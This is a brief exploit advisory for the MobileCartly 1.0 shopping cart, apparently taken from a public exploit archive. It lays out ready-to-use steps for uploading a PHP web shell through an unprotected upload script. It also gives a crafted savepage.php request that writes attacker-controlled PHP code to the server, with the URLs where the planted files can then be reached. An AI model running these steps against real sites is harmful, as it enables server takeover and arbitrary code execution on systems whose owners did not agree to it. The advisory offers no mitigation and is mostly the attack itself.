MobileCarty version 1.0 suffers from remote shell upload and arbitrary file creation vulnerabilities.
031c15b64894af18162856529f16567ee27ae3770721a9fcf82523b5a81ad648
####################################################
### Exploit Title: MobileCartly 1.0 Multiple Vulnerabilities
### Date: 11/08/2012
### Author: L0n3ly-H34rT
### Homepage: http://se3c.tk/
### Contact: l0n3ly_h34rt@hotmail.com
### Software Link : http://mobilecartly.com/mobilecartly.zip
### Tested on: Linux/Windows
####################################################
# Remote File Upload :
just upload shell.php here :
http://127.0.0.1/mobilecartly/images/upload.php
you see your file here :
http://127.0.0.1/mobilecartly/images/productimages/shell.php
# Arbitrary file create :
http://127.0.0.1/mobilecartly/includes/savepage.php?savepage=phpinfo.php&pagecontent=<?php phpinfo(); ?>
you will see your file phpinfo.php here :
http://127.0.0.1/mobilecartly/pages/phpinfo.php
-------------------------
# Greetz to my friendz